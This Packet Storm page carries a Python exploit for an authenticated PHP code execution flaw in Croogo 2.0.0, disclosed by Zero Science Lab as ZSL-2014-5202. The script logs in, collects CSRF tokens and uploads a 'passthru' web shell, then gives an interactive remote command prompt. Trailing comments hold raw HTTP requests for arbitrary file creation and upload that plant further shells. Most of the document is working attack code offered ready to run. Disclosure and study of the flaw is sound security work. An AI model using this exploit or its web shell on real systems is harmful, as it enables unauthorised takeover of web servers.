what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Croogo 2.0.0 Arbitrary PHP Code Execution

Croogo 2.0.0 Arbitrary PHP Code Execution
Posted Oct 13, 2014
Authored by LiquidWorm | Site zeroscience.mk

Croogo version 2.0.0 remote arbitrary PHP code execution exploit.

tags | exploit, remote, arbitrary, php, code execution
SHA-256 | caadc51f5dda3f63ab7b6436607e718c4f12b5901a75b377b8390a3e92ffdfc7

Croogo 2.0.0 Arbitrary PHP Code Execution

Change Mirror Download
#!/usr/bin/env python
#
#
# Croogo 2.0.0 Arbitrary PHP Code Execution Exploit
#
#
# Vendor: Fahad Ibnay Heylaal
# Product web page: http://www.croogo.org
# Affected version: 2.0.0
#
# Summary: Croogo is a free, open source, content management system
# for PHP, released under The MIT License. It is powered by CakePHP
# MVC framework.
#
# Desc: Croogo suffers from an authenticated arbitrary PHP code
# execution. The vulnerability is caused due to the improper
# verification of uploaded files in '/admin/file_manager/attachments/add'
# script thru the 'data[Attachment][file]' POST parameter and in
# '/admin/file_manager/file_manager/upload' script thru the
# 'data[FileManager][file]' POST parameter. This can be exploited
# to execute arbitrary PHP code by uploading a malicious PHP script
# file that will be stored in '/webroot/uploads/' directory.
#
# Tested on: Apache/2.4.7 (Win32)
# PHP/5.5.6
# MySQL 5.6.14
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#
# Zero Science Lab - http://www.zeroscience.mk
# Macedonian Information Security Research And Development Laboratory
#
#
# Advisory ID: ZSL-2014-5202
# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5202.php
#
# Vendor: http://blog.croogo.org/blog/croogo-210-released
#
#
# 26.07.2014
#
#

version = '5.0.0.251'

import itertools, mimetools, mimetypes
import cookielib, urllib, urllib2, sys
import logging, os, time, datetime, re

from colorama import Fore, Back, Style, init
from cStringIO import StringIO
from urllib2 import URLError

init()

if os.name == 'posix': os.system('clear')
if os.name == 'nt': os.system('cls')
piton = os.path.basename(sys.argv[0])

def bannerche():
print '''
@---------------------------------------------------------------@
| |
| Croogo 2.0.0 Arbitrary PHP Code Execution Exploit |
| |
| |
| ID: ZSL-2014-5202 |
| |
| Copyleft (c) 2014, Zero Science Lab |
| |
@---------------------------------------------------------------@
'''
if len(sys.argv) < 3:
print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' <hostname> <path>\n'
print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk croogo\n'
sys.exit()

bannerche()

print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET

host = sys.argv[1]
path = sys.argv[2]

cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))

try:
getcsrf = opener.open('http://'+host+'/'+path+'/admin/users/users/login')
csrf = getcsrf.read()
except urllib2.HTTPError, errorzio:
if errorzio.code == 404:
print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET
print
sys.exit()
except URLError, errorziocvaj:
if errorziocvaj.reason:
print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET
print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET
print
sys.exit()

print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET

token_key = re.search(r'\[key\]\" value=\"(.+?)\"', csrf).group(1)
print '\x20\x20[*] Retrieving login CSRF token '+'.'*27+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Login CSRF token: '+Fore.YELLOW+token_key+Fore.RESET

print '\x20\x20[*] Login please.'

username = raw_input('\x20\x20[*] Enter username: ')
password = raw_input('\x20\x20[*] Enter password: ')


login_data = urllib.urlencode({
'_method' : 'POST',
'data[User][password]' : password,
'data[User][remember]' : '0',
'data[User][username]' : username,
'data[_Token][fields]' : '93365ba06ce101995d3cd9c79cce968b12fb6ee5:',
'data[_Token][key]' : token_key,
'data[_Token][unlocked]' : ''
})


login = opener.open('http://'+host+'/'+path+'/admin/users/users/login', login_data)
auth = login.read()

for session in cj:
sessid = session.name

print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
ses_chk = re.search(r'%s=\w+' % sessid , str(cj))
cookie = ses_chk.group(0)
print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET

if re.search(r'Incorrect username or password', auth):
print '\x20\x20[*] Incorrect username or password '+'.'*24+Fore.RED+'[ER]'+Fore.RESET
print
sys.exit()
else:
print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET

getcsrfattach = opener.open('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
csrfattach = getcsrfattach.read()
token_key2 = re.search(r'\[key\]\" value=\"(.+?)\"', csrfattach).group(1)
print '\x20\x20[*] Retrieving upload CSRF token '+'.'*26+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Upload CSRF token: '+Fore.YELLOW+token_key2+Fore.RESET

class MultiPartForm(object):

def __init__(self):
self.form_fields = []
self.files = []
self.boundary = mimetools.choose_boundary()
return

def get_content_type(self):
return 'multipart/form-data; boundary=%s' % self.boundary

def add_field(self, name, value):
self.form_fields.append((name, value))
return

def add_file(self, fieldname, filename, fileHandle, mimetype=None):
body = fileHandle.read()
if mimetype is None:
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
self.files.append((fieldname, filename, mimetype, body))
return

def __str__(self):

parts = []
part_boundary = '--' + self.boundary

parts.extend(
[ part_boundary,
'Content-Disposition: form-data; name="%s"' % name,
'',
value,
]
for name, value in self.form_fields
)

parts.extend(
[ part_boundary,
'Content-Disposition: file; name="%s"; filename="%s"' % \
(field_name, filename),
'Content-Type: %s' % content_type,
'',
body,
]
for field_name, filename, content_type, body in self.files
)

flattened = list(itertools.chain(*parts))
flattened.append('--' + self.boundary + '--')
flattened.append('')
return '\r\n'.join(flattened)

if __name__ == '__main__':

form = MultiPartForm()
form.add_field('_method', 'POST')
form.add_field('data[_Token][key]', token_key2)
form.add_field('data[_Token][fields]', 'c0c3f5d102d9672429f5c571a5f45c34255a93a9%3A')
form.add_field('data[_Token][unlocked]', '')

form.add_file('data[Attachment][file]', 'zsl.php',
fileHandle=StringIO('<?php echo \"<pre>\"; passthru($_GET[\'cmd\']); echo \"</pre>\"; ?>'))

request = urllib2.Request('http://'+host+'/'+path+'/admin/file_manager/attachments/add')
request.add_header('User-agent', 'joxypoxy 5.0')
body = str(form)
request.add_header('Content-type', form.get_content_type())
request.add_header('Cookie', cookie)
request.add_header('Content-length', len(body))
request.add_data(body)
request.get_data()
urllib2.urlopen(request).read()
print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET


print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET
time.sleep(1)

furl = '/uploads/zsl.php'
#furl = '/webroot/uploads/zsl.php'

print
today = datetime.date.today()
fname = 'croogo-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log'
logging.basicConfig(filename=fname,level=logging.DEBUG)

logging.info(' '+'+'*75)
logging.info(' +')
logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S'))
logging.info(' + Title: Croogo 2.0.0 Arbitrary PHP Code Execution Exploit')
logging.info(' + Python program executed: '+sys.argv[0])
logging.info(' + Version: '+version)
logging.info(' + Full query: \''+piton+'\x20'+host+'\'')
logging.info(' + Username input: '+username)
logging.info(' + Password input: '+password)
logging.info(' + Vector: '+'http://'+host+'/'+path+furl)
logging.info(' +')
logging.info(' + Advisory ID: ZSL-2014-5202')
logging.info(' + Zero Science Lab - http://www.zeroscience.mk')
logging.info(' +')
logging.info(' '+'+'*75+'\n')

print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET
raw_input()
while True:
try:
cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET)
execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd))
reverse = execute.read()
pattern = re.compile(r'<pre>(.*?)</pre>',re.S|re.M)

print Style.BRIGHT+Fore.CYAN
cmdout = pattern.match(reverse)
print cmdout.groups()[0].strip()
print Style.RESET_ALL+Fore.RESET

if cmd.strip() == 'exit':
break

logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n')
except Exception:
break

logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG')
print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET
print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET
print

sys.exit()

#
## OTHER ##
#
#
# Arbitrary file creation any location:
#
# - http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A\xampp\htdocs\croogo\
#
#
# Arbitrary file upload any location:
# - http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5C
#
#
###########
#
# POST /croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/create_file?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 229
#
# _method=POST&data%5B_Token%5D%5Bkey%5D=4f20867747cbff33951db804266494804e96bf89&data%5BFileManager%5D%5Bname%5D=shell2.php&data%5B_Token%5D%5Bfields%5D=4aeda1af05803a2ae8503d6033160c17d6335641%253A&data%5B_Token%5D%5Bunlocked%5D=
#
###########
#
# POST /croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/editfile?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5Cshell2.php
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 304
#
# _method=POST&data%5B_Token%5D%5Bkey%5D=5a6516e263eb6e5504e2266783b42cd08e3efe16&data%5BFileManager%5D%5Bcontent%5D=test%0D%0A%3C%3Fphp%0D%0Apassthru%28%24_GET%5B%27cmd%27%5D%29%3B%0D%0A%3F%3E%0D%0A&data%5B_Token%5D%5Bfields%5D=8f1bb3e7acda642ca69ee0430abba1f5ecd5f7a7%253A&data%5B_Token%5D%5Bunlocked%5D=
#
###########
#
# POST /croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C HTTP/1.1
# Host: localhost
# User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
# Accept-Language: en-US,en;q=0.5
# Accept-Encoding: gzip, deflate
# Referer: http://localhost/croogo/admin/file_manager/file_manager/upload?path=C%3A%5Cxampp%5Chtdocs%5Ccroogo%5Cwebroot%5Cuploads%5C
# Cookie: CAKEPHP=b5v6bft5a5ibj0ndcvb28i4v84
# Connection: keep-alive
# Content-Type: multipart/form-data; boundary=---------------------------25555888422431
# Content-Length: 779
#
# -----------------------------25555888422431
# Content-Disposition: form-data; name="_method"
#
# POST
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][key]"
#
# 0d940d3b3f4c80ea98b3e5588c337587f7c50d5e
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[FileManager][file]"; filename="exploit.php"
# Content-Type: application/octet-stream
#
# test
# <?php
# passthru($_GET['cmd']);
# ?>
#
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][fields]"
#
# 6f3f788048d33beefcc340fe281cf758e20ad329%3A
# -----------------------------25555888422431
# Content-Disposition: form-data; name="data[_Token][unlocked]"
#
#
# -----------------------------25555888422431--
#
#
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    27 Files
  • 13
    Aug 13th
    18 Files
  • 14
    Aug 14th
    50 Files
  • 15
    Aug 15th
    33 Files
  • 16
    Aug 16th
    23 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    43 Files
  • 20
    Aug 20th
    29 Files
  • 21
    Aug 21st
    42 Files
  • 22
    Aug 22nd
    26 Files
  • 23
    Aug 23rd
    25 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    21 Files
  • 27
    Aug 27th
    28 Files
  • 28
    Aug 28th
    15 Files
  • 29
    Aug 29th
    41 Files
  • 30
    Aug 30th
    13 Files
  • 31
    Aug 31st
    467 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close